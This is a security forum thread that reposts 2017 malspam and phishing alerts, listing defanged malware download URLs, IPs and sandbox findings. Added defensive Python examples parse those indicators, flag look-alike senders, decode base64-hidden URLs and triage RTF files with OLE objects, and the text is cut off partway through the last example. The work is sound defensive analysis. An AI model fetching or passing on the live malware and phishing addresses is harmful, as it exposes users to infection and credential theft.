52.15.162.35: https://www.virustot...35/information/
> https://www.virustot...1b9a6/analysis/
___

Office365 - Phish
- https://myonlinesecu...uired-phishing/
7 Jun 2017 - "... pretends to be a message from Microsoft Office365 saying 'your mailbox is full'...

Screenshot: https://myonlinesecu...shing-email.png

-If- you follow the link in the email, you first get sent to:
 http ://ronaldsinkwell .com.br/js/Office365/Secure/ where you get an immediate -redirection- ... and you see a webpage looking like this:
 http ://www .ftc-network .com/js/Microsoft/Office365/ :
> https://myonlinesecu...65_phishing.png

... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

ronaldsinkwell .com.br: 192.185.214.91: https://www.virustot...91/information/
> https://www.virustot...aff52/analysis/

ftc-network .com: 103.13.240.186: https://www.virustot...86/information/
> https://www.virustot...d1b26/analysis/
 

:ninja: :ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 07 June 2017 - 12:43 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1942 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 June 2017 - 07:13 AM

FYI...

Fake 'eFax' SPAM - delivers smoke/sharik/dofoil and Trickbot
- https://myonlinesecu...l-and-trickbot/
7 June 2017 - "An email with the subject of 'eFax message from 0300 200 3835' – 2 pages pretending to come from efax but actually coming from a look-alike-domain eFax <message@ mail.efaxcorporate254 .top> with a malicious word doc attachment...
mail.efaxcorporate254 .top was registered on 5 June 2017 via publicdomainregistry .com using what are obviously -fake- details and hosted on a Russian server 185.186.141.227. Other -variants- of the domain are hosted on other IPs in the '109.248.200.0 – 109.248.203.255' and '185.186.140.0 – 185.186.143.255' ranges. Other -variants- of this were registered between 1st and 5th June 2017...

Screenshot: https://myonlinesecu...835-2-pages.png

FAX_20170607_1496754696_302.doc - Current Virus total detections 7/57* Payload Security** shows a download from
  http ://5.149.250.240 /jun7.exe gets -renamed- to Pvmzgo.exe and autorun (VirusTotal 35/61[3]) Payload Security[4]. The malware on http ://5.149.250.240 is being updated at frequent intervals (currently still using jun7.exe) but I have seen 2 different versions since I originally posted... VirusTotal 10/59[5] 14/61[6] Payload Security[7]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496851706/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
5.149.250.240
185.159.128.150


3] https://www.virustot...87736/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
95.101.187.176
185.159.128.150


5] https://www.virustot...sis/1496866638/
jun7_exe

6] https://www.virustot...sis/1496899315/
jun7.exe

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts
212.227.91.231
193.104.215.58
185.159.128.150


> Update 8 June 2017: -another- run of same email...
fax_20170608_96784512_336.doc - Current Virus total detections 5/55[8]. Payload Security[9] shows a download from
  http ://185.81.113.94 /jun8.exe gets -renamed- to Gqkdau.exe and autorun
(VirusTotal 14/61[10]) Payload Security[11]...
8] https://www.virustot...sis/1496913428/

9] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.81.113.94
185.159.128.150
192.150.16.117


10] https://www.virustot...sis/1496924193/
jun8.exe

11] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.81.113.94: https://www.virustot...94/information/
> https://www.virustot...b40e6/analysis/
185.81.113.94 /jun8.exe
___

More Fake 'eFax' SPAM - delivers malware via ole rtf exploit
- https://myonlinesecu...le-rtf-exploit/
8 Jun 2017 - "Another -fake- eFax email... subject of 'eFax message from 116 – 921 – 1271' – 5 pages pretending to come from eFax Inc <noreply@ efax .com> with a zip attachment containing a malicious word doc...

Screenshot: https://myonlinesecu...271-5-pages.png

QSVN19945204621.zip extracts to pxsmnxd.doc - Current Virus total detections 11/57*. Payload Security**...
... 'found an embedded ole object in the rtf file. It will be using a recent rtf exploit... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496924661/
pxsmnxd.doc

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
5.196.42.122: https://www.virustot...22/information/
> https://www.virustot...9a263/analysis/
 

:ninja: :ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 08 June 2017 - 02:09 PM.

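The eFax run above turns on a look-alike sender domain (mail.efaxcorporate254 .top standing in for efax.com), and the DHL 'Commercial Invoice' run in post #1948 does the same with dhl-invoice .com. As an added example that is not part of this thread or of the myonlinesecurity.co.uk write-ups, the Python below flags From: headers whose display name or domain mentions a watched brand while the domain is not that brand's own. The BRAND_DOMAINS allow-list and the sample headers are constructed for illustration: efax.com is named on the page, dhl.com and moneygram.com are assumed to be the brands' real domains.

```python
import re
from typing import Optional, Tuple

# Illustrative allow-list (constructed for this example): brand keyword -> the brand's own
# registrable domains. efax.com appears in the thread; dhl.com and moneygram.com are assumed.
BRAND_DOMAINS = {
    "efax": {"efax.com"},
    "dhl": {"dhl.com"},
    "moneygram": {"moneygram.com"},
}

# Optional display name, then an addr-spec: 'eFax <message@mail.example.top>' or 'x@y.z'.
FROM_RE = re.compile(
    r'^\s*(?:"?(?P<name>[^"<]*?)"?\s*<)?'
    r"(?P<local>[^<>\s@]+)@(?P<domain>[A-Za-z0-9.-]+)>?\s*$"
)


def parse_from(header: str) -> Optional[Tuple[str, str]]:
    """Return (display_name, domain) from a From: header value, or None if unparseable."""
    m = FROM_RE.match(header)
    if not m:
        return None
    return (m.group("name") or "").strip(), m.group("domain").lower().rstrip(".")


def is_brand_domain(domain: str, legit: set) -> bool:
    """True if domain is one of the brand's domains or a subdomain of one."""
    return any(domain == d or domain.endswith("." + d) for d in legit)


def classify_sender(header: str) -> Tuple[str, Optional[str]]:
    """Classify a From: header.

    'lookalike'    - a brand is named in the display name or domain, but the domain is not
                     the brand's own (mail.efaxcorporate254.top, dhl-invoice.com).
    'brand-domain' - the domain really is the brand's; the header may still be forged, so
                     this is NOT a clean bill of health (SPF/DKIM/DMARC decide that).
    'unrelated'    - no watched brand mentioned.
    """
    parsed = parse_from(header)
    if parsed is None:
        return ("unparseable", None)
    name, domain = parsed
    haystack = f"{name} {domain}".lower()
    for brand, legit in BRAND_DOMAINS.items():
        if brand not in haystack:
            continue
        if is_brand_domain(domain, legit):
            return ("brand-domain", brand)
        return ("lookalike", brand)
    return ("unrelated", None)


if __name__ == "__main__":
    # Constructed headers modelled on the senders described in this thread.
    for h in [
        "eFax <message@mail.efaxcorporate254.top>",
        "eFax Inc <noreply@efax.com>",
        "export@dhl-invoice.com",
        "Anna Mills <anna.mills@example.org>",
    ]:
        print(f"{classify_sender(h)!s:28} {h}")
```

A sender that uses the real brand domain, like the second eFax mail's noreply@ efax .com, comes back as 'brand-domain' because the header is simply forged; that case needs the SPF, DKIM and DMARC results the receiving MTA records, not a string comparison.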

#1943 AplusWebMaster


Posted 09 June 2017 - 07:08 AM

FYI...

Fake 'Credit Note' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
9 Jun 2017 - "... an email with the subject of 'Copy Credit Note' coming or pretending to come from Anna Mills anna.mills@ random email addresses with a semi-random named zip attachment which contains another zip file which delivers a wsf file eventually delivering what looks like emotet banking Trojan...

Screenshot: https://myonlinesecu.../anna_mills.png

1763904.zip extracts to AA-213-RR.zip: Extracts to: AA-213-RR.wsf - Current Virus total detections 11/55*
Payload Security** shows a download of an encrypted file from
 http ://sellitni .com/hjgf677??RqtfrQRDh=FirlRSoaCC  which is converted by the script to emsjwIjFro1.exe
(VirusTotal 22/61[3]) which suggests it might be emotet banking malware (Payload Security[4])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496999598/
AA-213-RR.wsf

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
188.165.220.204: https://www.virustot...04/information/
> https://www.virustot...6be34/analysis/

3] https://www.virustot...f0ba0/analysis/

4] https://www.hybrid-a...vironmentId=100
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 09 June 2017 - 07:16 AM.


#1944 AplusWebMaster


Posted 12 June 2017 - 01:39 PM

FYI...

Fake 'invoice' SPAM - delivers malware
- https://myonlinesecu...sing-wsf-files/
12 Jun 2017 - "... an email with the subject of 'Invoice PIS0120650' (random numbers) coming or pretending to come from NoReplyMailbox @ random companies, names and email addresses with a zip attachment which matches the subject that contains another zip file, containing a WSF file which eventually delivers what looks like it will turn out to be either Dridex or Trickbot banking Trojan...

Screenshot: https://myonlinesecu...-PIS0120650.png

InvoicePIS0120650.zip: extracts to LZTFBQLX6G.zip which extracts to: LZTFBQLX6G.wsf
Current Virus total detections 12/56*. Payload Security** shows a download of an encrypted file from
 http ://ythongye .com/8yhf2ui? which is converted by the script to wvHyIX1.exe
(VirusTotal 19/60[3]) Payload Security[4]...  found 4 -different- WSF files amongst the 150 zips received:
LZTFBQLX6G.wsf - Current Virus total detections 12/56[5]
IZ7JAG6.wsf - Current Virus total detections 11/55[6]
MVUN1W9FO1.wsf - Current Virus total detections 14/56[7]
TOTAHZEQT.wsf - Current Virus total detections 14/56[8]
Manual examination of the various WSF scripting files received shows these download Locations for the malware (obfuscated in the WSF file using base64 encoding & extra padding):
78tguyc876wwirglmltm .net/af/8yhf2ui > 119.28.85.128
e67tfgc4uybfbnfmd .org/af/8yhf2ui > 119.28.85.128
sacrecoeur.bravepages .com/8yhf2ui? > 66.219.202.10
ythongye .com/8yhf2ui? > 103.249.108.128
sheekchilly .com/8yhf2ui? > 103.21.59.174
lamartechnical .com/8yhf2ui? > 216.97.233.44
syrianchristiancentre .org/8yhf2ui? > 103.21.58.130
skveselka .wz.cz/8yhf2ui > 185.64.219.7
svadba-tamada .de/8yhf2ui > 81.169.145.148
aacom .pl/8yhf2ui? > 193.239.206.248
smartzaa .com/8yhf2ui? > 103.21.58.252
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497289622/
LZTFBQLX6G.wsf

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
103.249.108.128

3] https://www.virustot...43277/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
103.249.108.128

5] https://www.virustot...sis/1497289622/

6] https://www.virustot...sis/1497281678/

7] https://www.virustot...sis/1497294665/

8] https://www.virustot...sis/1497294745/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 12 June 2017 - 03:11 PM.

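Every post in this run lists the same trailing download token (7gyb3ds, 8yhf2ui, 98tf77b, 08345ug) across dozens of compromised domains, written defanged ('beursgays .com\7gyb3ds' in the Trickbot post above, 'ythongye .com/8yhf2ui? > 103.249.108.128' in this one). As an added example, not code from this thread or from myonlinesecurity.co.uk, the Python below parses those defanged lines into host, path and resolved IP, groups hosts by the campaign token so one run's distribution sites can be handled together, and emits a flat blocklist. The sample lines are copied from those two posts; the regex is my own assumption about the notation.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample in the thread's defanged notation; hosts and tokens are the ones quoted
# in the Trickbot post above and in post #1944, plus two non-indicator lines.
SAMPLE_LINES = [
    r"http ://beursgays .com\7gyb3ds",
    r" essentialnulidtro .com\af\7gyb3ds",
    r" martos .pt\7gyb3ds ...",
    r"78tguyc876wwirglmltm .net/af/8yhf2ui > 119.28.85.128",
    r"ythongye .com/8yhf2ui? > 103.249.108.128",
    r"skveselka .wz.cz/8yhf2ui > 185.64.219.7",
    r"Contacted Hosts",
    r"178.237.37.40",
]

# Assumed grammar of a defanged line: optional 'http ://', a host whose dots may be padded
# with spaces, an optional path ('\' or '/' separated, maybe ending in '?'), and an optional
# '> resolved-IP'.  Bare IPs are rejected because the last label must start with a letter.
IOC_RE = re.compile(
    r"^\s*(?:https?\s*:\s*//\s*)?"
    r"(?P<host>[A-Za-z0-9-]+(?:\s*\.\s*[A-Za-z0-9-]+)*\s*\.\s*[A-Za-z][A-Za-z0-9-]*)"
    r"(?P<path>[\\/][^\s>]*)?"
    r"\s*(?:>\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"
    r"\s*\.{0,3}\s*$"
)


def parse_ioc_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Normalise one defanged line to {'host', 'path', 'ip'}; None if it is not an indicator."""
    m = IOC_RE.match(line)
    if not m:
        return None
    host = re.sub(r"\s+", "", m.group("host")).lower()
    path = (m.group("path") or "/").replace("\\", "/")
    return {"host": host, "path": path, "ip": m.group("ip")}


def campaign_token(path: str) -> str:
    """Last path segment without a trailing '?': the per-run token shared across hosts."""
    return path.rstrip("?").rstrip("/").split("/")[-1]


def cluster_by_token(lines: List[str]) -> Dict[str, List[str]]:
    """Group distribution hosts by the campaign token in their download path."""
    clusters: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        ioc = parse_ioc_line(line)
        if ioc is None:
            continue
        token = campaign_token(ioc["path"])
        if token and ioc["host"] not in clusters[token]:
            clusters[token].append(ioc["host"])
    return dict(clusters)


def blocklist(lines: List[str]) -> List[str]:
    """Sorted, de-duplicated hosts and resolved IPs for a DNS sinkhole or firewall list."""
    entries = set()
    for line in lines:
        ioc = parse_ioc_line(line)
        if ioc:
            entries.add(ioc["host"])
            if ioc["ip"]:
                entries.add(ioc["ip"])
    return sorted(entries)


if __name__ == "__main__":
    for token, hosts in cluster_by_token(SAMPLE_LINES).items():
        print(f"{token}: {len(hosts)} hosts -> {', '.join(hosts)}")
    print("blocklist:", blocklist(SAMPLE_LINES))
```

The token grouping is the useful part for a defender: a new domain seen serving /8yhf2ui belongs to the same run as the ones already listed, even before its own sample has been sandboxed.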

#1945 AplusWebMaster


Posted 14 June 2017 - 05:30 AM

FYI...

Fake 'Emailing' SPAM - delivers pdf malware
- https://myonlinesecu...eliver-malware/
14 Jun 2017 - "... an email with the subject of 'Emailing: 288639672' (random numbers) pretending to come from random names and email addresses that delivers some sort of malware. Over the last couple of weeks these have switched between Jaff ransomware, Dridex banking Trojans and Trickbot banking Trojan...

Screenshot: https://myonlinesecu...g-288639672.png

288639672.pdf Current Virus total detections 11/56*. Payload Security** drops 000049764694.xlsm
(VirusTotal 11/56[3]) (Payload Security[4]). JoeSandbox[5]: downloads an encrypted txt file from
 http ://mailblust .com\98tf77b which is converted by the script to fungedsp8.exe (VirusTotal 8/60[6])..
There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)
mailblust .com\98tf77b > 162.251.85.92
78tguyc876wwirglmltm .net\af\98tf77b > 119.28.85.128
randomessstioprottoy .net\af\98tf77b > 119.28.85.128
3456group .com\98tf77b > 69.49.96.24
... Other sites found so far have been posted HERE:
- https://twitter.com/...943588412653568
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497432816/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
162.251.85.92

3] https://www.virustot...sis/1497432816/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
162.251.85.92

5] https://jbxcloud.joe...s/291764/1/html

6] https://www.virustot...sis/1497433869/
___

'Google Drive' - Phish
- https://myonlinesecu...-phishing-scam/
14 Jun 2017 - "...  phishing attempts for email credentials... pretends to be a message saying 'log in to Google Drive' to get some documents that have been sent to you...

Screenshot: https://myonlinesecu...ve-phishing.png

If you follow the link (all are identical) you see a webpage looking like this:
 https ://www.mealcare .ca/gdrive/drive/drive/auth/view/share/ - but it is HTTPS so it is "safe". That is, nothing you give to the criminal can be intercepted, so your email log in details can’t be stolen by another criminal on the way. Remember a green padlock HTTPS does NOT mean the site is safe. All it means is secure from easy interception between your computer and that site:
> https://myonlinesecu...ogle_phish1.png

After you select 'click here' on this identical copy of the Google drive page (if you are not looking at the url bar) you get:
> https://myonlinesecu...ogle_phish2.png

After you input your details you get sent to a 404 not found page on the Morgan Stanley website. I can only assume the phisher tried to link originally to a genuine pdf on Morgan Stanley who quickly removed it:
> https://myonlinesecu...stanley_404.png..."

mealcare .ca: 77.104.162.117: https://www.virustot...17/information/
> https://www.virustot...c8939/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 14 June 2017 - 11:46 AM.


#1946 AplusWebMaster


Posted 15 June 2017 - 06:21 AM

FYI...

Fake 'Moneygram' SPAM - delivers java adwind
- https://myonlinesecu...rs-java-adwind/
15 Jun 2017 - "... a slightly different subject and email content to previous ones... These have a genuine PDF attachment with a -link- in it that downloads a zip containing the malware. The link goes to
 https ://www.domingosdandreaimoveis .com.br/wp-admin/images/Moneygram.transactions.12thJune.2017.zip
which is almost certainly a compromised wordpress site...

Screenshot: https://myonlinesecu...h-June-2017.png

The pdf looks like:
> https://myonlinesecu...chedule_pdf.png

Moneygram.transactions.12thJune.2017.jar (474kb) - Current Virus total detections 21/55*. Payload Security**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497502711/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.120.144.148

domingosdandreaimoveis .com.br: 187.45.187.122: https://www.virustot...10/information/
 

:ninja: :ninja:    :grrr:



#1947 AplusWebMaster


Posted 16 June 2017 - 07:28 AM

FYI...

Fake Email account notice – Phish
... 'Your Mailbox Will Be Terminated'
- https://myonlinesecu...il-credentials/
16 Jun 2017 - "We see lots of phishing attempts for email credentials. This one is slightly different...

Screenshot: https://myonlinesecu...ler.co_.uk-.png

If you follow the link you see a webpage looking like this:
 https ://deadsocial .com//media/email_updatep1/login.php?userid=ans@ thespykiller .co.uk
(you can put any email address at the end of the link & get the same page with email already filled in).
The red countdown continues to decrease in time while the page is open:
> https://myonlinesecu...mail_update.png

... After you input your email address and password, you get told 'incorrect details' and forwarded to an almost identical looking page where you can put it in again and it does that on a continual loop:
> https://myonlinesecu...ail_update2.png

... Don’t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information..."

deadsocial .com: 184.154.216.243: https://www.virustot...43/information/
> https://www.virustot...b24c7/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 17 June 2017 - 06:29 AM.


#1948 AplusWebMaster


Posted 20 June 2017 - 04:40 AM

FYI...

Fake DHL SPAM - delivers malware
- https://myonlinesecu...livers-malware/
20 Jun 2017 - "An email with the subject of 'Commercial Invoice' pretending to come from export@ dhl-invoice .com with a malicious Excel XLS spreadsheet attachment delivers some sort of malware... I am being told that -other- subjects in this malspam run -spoofing- DHL include: 'DHL Commercial Invoice' and 'DHL poforma invoice'. There appear to be several different -spoofed- senders @dhl-invoice .com...

Screenshot: https://myonlinesecu...lspam-email.png

dhl_commercial_invoice_.xls - Current Virus total detections 5/55*. Payload Security** shows a download from
 http ://travel-taxi .net/test/edf.exe (VirusTotal 51/62[3]), (Payload Security[4]).
Other download locations -embedded- in other versions of the macro include
 http ://okinawa35 .net/m/iop.exe
The XLS file looks like:
> https://myonlinesecu...invoice_xls.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497948303/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
202.218.50.130

3] https://www.virustot...fe217/analysis/

4] https://www.hybrid-a...vironmentId=100

travel-taxi .net: 203.183.93.149: https://www.virustot...49/information/
> https://www.virustot...fc1d5/analysis/

okinawa35 .net: 202.218.50.130: https://www.virustot...30/information/
> https://www.virustot...3fd1c/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 20 June 2017 - 04:40 AM.


#1949 AplusWebMaster


Posted 21 June 2017 - 11:04 AM

FYI...

Fake 'Invoice' SPAM - delivers Locky
- https://myonlinesecu...invoice-emails/
21 Jun 2017 - "... an email with the subject of 'Copy of Invoice 79898702' coming or pretending to come from noreply@ random email addresses with a semi-random named zip attachment in the format of 79898702.zip (random 8 digits). The zip matches the subject... Whether this is a permanent return to Locky or a one off, I don’t know... Locky has vanished for a while before & returned. It is also very unusual for Locky to come as an executable file inside a zip...

Screenshot: https://myonlinesecu...ce-79898702.png

79898702.zip: extracts to INV-09837592.zip which in turn Extracts to: INV-09837592.exe
Current Virus total detections 10/60*. Payload Security**. None of the sandboxes are showing any encrypting activity or the usual Locky signs, so it looks like a -new- version with protections against analysis. We only know it is Locky because one of the analysts[1] extracted the Locky payload from the memory while running this file (Virustotal 39/60***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...f9cd8/analysis/
INV-09837592.exe

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1498057764/
_005C0000.mem

1] https://twitter.com/...544503720247296

- http://blog.talosint...y-campaign.html
June 21, 2017 - "... The volume of Locky spam Necurs has sent since the start of this particular campaign is notable. In the first hour of this campaign, Talos observed that Locky spam accounted for up to 7.2% of email volume on one of our systems*. While the campaign has since decreased in the number of messages being sent per minute, Necurs is still actively sending messages containing Locky... we can expect a fixed version of Locky to appear in a future round of Necurs' ransomware spam... it's always risky clicking-on-links or opening -attachments- in strange email messages..."
> https://1.bp.blogspo...1600/image3.jpg
___

Fake 'Receipt to print' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
21 Jun 2017 - "... an email with the subject of 'Receipt to print' coming or pretending to come from random companies, names and email addresses with a semi-random named zip attachment which delivers some malware... Earlier WSF files today delivered Trickbot banking Trojan...

Screenshot: https://myonlinesecu...pt-to-print.png

Receipt_6706.zip: extracts to archive0124.zip which extracts to: 0923.wsf
Current Virus total detections 11/57*. Payload Security** shows a download of an encrypted file from
 http ://tag27 .com/08345ug? which is converted by the script to IeEOifS6.exe (VirusTotal 11/57***).
Manual examination and basic decoding of the WSF file shows these download locations:
tag27 .com/08345ug? > 162.210.102.220
78tguyc876wwirglmltm .net/af/08345ug > 119.28.86.18
malamalamak9 .net/08345ug? > 74.122.121.8
randomessstioprottoy .net/af/08345ug > 119.28.86.18
shreveporttradingantiques .com/08345ug? > 74.220.215.225 ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1498051603/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
162.210.102.220
119.28.86.18
74.122.121.8


*** https://www.virustot...sis/1480617465/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 22 June 2017 - 07:12 AM.

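Post #1944 and the 'Receipt to print' post above both say the WSF downloaders hide their URLs "using base64 encoding & extra padding" and that the locations had to be recovered by manual decoding. As an added example (not the thread's or the blog's code, and not the samples' actual obfuscation scheme, which the posts do not reproduce), the Python below does the first-pass triage an analyst would run on such a script: find base64-looking runs, decode them while tolerating surplus '=' padding, and pull out any URLs. The sample WSF text and the placeholder host dl.example.test are constructed here.

```python
import base64
import binascii
import re
from typing import List

# Candidate base64 run: 16+ alphabet characters, then any amount of '=' (the "extra padding").
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,16}")
# URL inside decoded bytes; stops at whitespace and quote/angle characters.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'<>]*)?")


def tolerant_b64decode(run: str) -> bytes:
    """Decode a base64 run, ignoring surplus '=' and restoring correct padding.

    Returns b'' when the run is not valid base64 at all.
    """
    core = run.rstrip("=")
    if len(core) % 4 == 1:          # impossible length for base64: drop the stray character
        core = core[:-1]
    core += "=" * (-len(core) % 4)  # re-pad to a multiple of 4
    try:
        return base64.b64decode(core, validate=True)
    except (binascii.Error, ValueError):
        return b""


def extract_urls_from_script(script_text: str) -> List[str]:
    """Plain-text URLs plus URLs hidden in base64 runs, de-duplicated in discovery order."""
    found: List[str] = []

    def add(blob: bytes) -> None:
        for u in URL_RE.findall(blob):
            s = u.decode("ascii", "replace")
            if s not in found:
                found.append(s)

    add(script_text.encode("utf-8", "replace"))
    for m in B64_RUN_RE.finditer(script_text):
        add(tolerant_b64decode(m.group(0)))
    return found


def build_sample_wsf() -> str:
    """Constructed WSF-like text: one base64 URL literal with four surplus '=' appended.

    dl.example.test is a placeholder, not an indicator from the thread.
    """
    url = "http://dl.example.test/8yhf2ui?"
    blob = base64.b64encode(url.encode()).decode() + "===="
    return (
        '<job id="x"><script language="JScript">\n'
        f'var k = "{blob}";\n'
        "// rest of the downloader deliberately omitted in this constructed sample\n"
        "</script></job>\n"
    )


if __name__ == "__main__":
    print(extract_urls_from_script(build_sample_wsf()))
```

Real samples also split, reverse or XOR their strings, so a hit list from this pass is a starting point for the manual work the posts describe, not a replacement for it; the posts' '> IP' resolutions come from a separate DNS lookup step.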

#1950 AplusWebMaster


Posted 26 June 2017 - 04:17 AM

FYI...

Fake 'INVOICE' SPAM - delivers malware
- https://myonlinesecu...eliver-malware/
26 Jun 2017 - "An email with the subject of '*CONFIRM ORDER AND REVISE INVOICE*' pretending to come from admin@ random company with a malicious word doc attachment. This word doc is actually an RTF file that uses what looks like the CVE-2017-0199 exploit...

Screenshot: https://myonlinesecu...ISE-INVOICE.png

Order Ref-22550.doc - Current Virus total detections 16/56*. Neither MALWR nor JoeSandbox could get any malicious content from it. Payload Security is still -down- this morning for maintenance that was hoped to be done over the weekend.
Update: after a bit of manual editing & investigating I was able to find the download location:
  https ://dev.null .vg/OtoGQj9.hta (VirusTotal 13/56**) ( MALWR***) which should deliver
  http ://allafrance .com/ziko.exe but is currently giving me a 404... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1498451330/
Order Ref-22550.doc

** https://www.virustot...sis/1498457573/
OtoGQj9.hta

*** https://malwr.com/an...mYzMjAzNjBkNjY/

dev.null .vg: 104.27.187.29: https://www.virustot...29/information/
> https://www.virustot...09263/analysis/
104.27.186.29: https://www.virustot...29/information/
> https://www.virustot...09263/analysis/

allafrance .com: 85.14.171.25: https://www.virustot...25/information/
> https://www.virustot...7eb4e/analysis/
___

Fake 'invoice' SPAM - links to malware doc file
- https://myonlinesecu...eliver-malware/
26 Jun 2017 - "... An email with the subject of 'Cust # 880767-00057' [redacted] pretending to come from Jackie Fill <vs1.kirchdorf@ eduhi .at> (probably random senders) with a -link- that downloads a malicious word doc. The subject and the link that appears in the body of the email have the recipient's name in them but the actual link doesn’t. The link in this case went to
 http ://facyl .com.br/Invoices-payments-and-questions-JBQHL-933-907247/ where it downloaded a macro enabled word doc (the link is very slow & does time out)...

Screenshot: https://myonlinesecu...80767-00057.png

Invoice-NUVKHC-227-980463.doc - Current Virus total detections 9/56*... Joesandbox** shows connections to numerous sites where a malicious file is downloaded using PowerShell, including:
 http ://carbeyondstore .com/cianrft/ > 72.52.246.64
 http ://motorgirlstv .com/kdm/ > 202.191.62.208
 http ://nonieuro .com/xauqt/ > 216.104.189.202
 http ://pxpgraphics .com/espzyurt/ > 69.65.3.206
 http ://studiogif .com.br/jedtvuziky/ > 192.185.216.153
Eventually giving an .exe file (VirusTotal 10/61***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it..."
* https://www.virustot...sis/1498480442/

** https://jbxcloud.joe...s/297919/1/html

*** https://www.virustot...sis/1498478920/

facyl .com.br: 187.45.187.130: https://www.virustot...30/information/
> https://www.virustot...b44e5/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 27 June 2017 - 06:04 AM.

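The '*CONFIRM ORDER AND REVISE INVOICE*' attachment above is, in the post's words, "actually an RTF file" carrying an embedded OLE object tied to CVE-2017-0199, and the second eFax run in post #1942 used the same OLE-in-RTF delivery. As an added example, not taken from this thread or from myonlinesecurity.co.uk, the Python below does the container check a mail gateway or analyst can run on such an attachment: sniff the real file type from its first bytes, compare it with what the extension claims, and, for RTF, list the OLE-object control words present. The sample byte strings are constructed and the objdata hex is a placeholder.

```python
import re
from typing import Dict, List, Union

RTF_MAGIC = b"{\\rt"                            # Word accepts '{\rt...' even when not '{\rtf1'
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # legacy .doc/.xls compound file
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docx/.xlsm) is a zip

# What each extension is expected to contain; used to spot 'a .doc that is really an RTF'.
EXPECTED_CONTAINER = {
    "doc": {"ole2"}, "xls": {"ole2"},
    "rtf": {"rtf"},
    "docx": {"ooxml"}, "docm": {"ooxml"}, "xlsx": {"ooxml"}, "xlsm": {"ooxml"},
}

# RTF control words that introduce an OLE object.  \objupdate makes Word refresh the object
# on open and is the control word commonly seen in CVE-2017-0199 documents.
RTF_OLE_RE = re.compile(rb"\\obj(?:ect|data|emb|update)(?![a-z])")

# Constructed samples (not real malware); the objdata hex is a placeholder.
SAMPLE_RTF_AS_DOC = b"{\\rtf1\\ansi{\\object\\objemb\\objupdate{\\*\\objdata 00000000}}}"
SAMPLE_OLE_DOC = OLE_MAGIC + b"\x00" * 24
SAMPLE_DOCX = ZIP_MAGIC + b"\x14\x00" * 3


def sniff_container(data: bytes) -> str:
    """Identify the container from leading bytes, ignoring the file name entirely."""
    if data.startswith(RTF_MAGIC):
        return "rtf"
    if data.startswith(OLE_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    return "unknown"


def rtf_ole_words(data: bytes) -> List[str]:
    """OLE-related RTF control words in order of first appearance."""
    seen: List[str] = []
    for w in RTF_OLE_RE.findall(data):
        s = w.decode("ascii")
        if s not in seen:
            seen.append(s)
    return seen


def triage_document(filename: str, data: bytes) -> Dict[str, Union[str, bool, List[str]]]:
    """Flag extension/content mismatches and OLE objects inside RTF."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    container = sniff_container(data)
    expected = EXPECTED_CONTAINER.get(ext)
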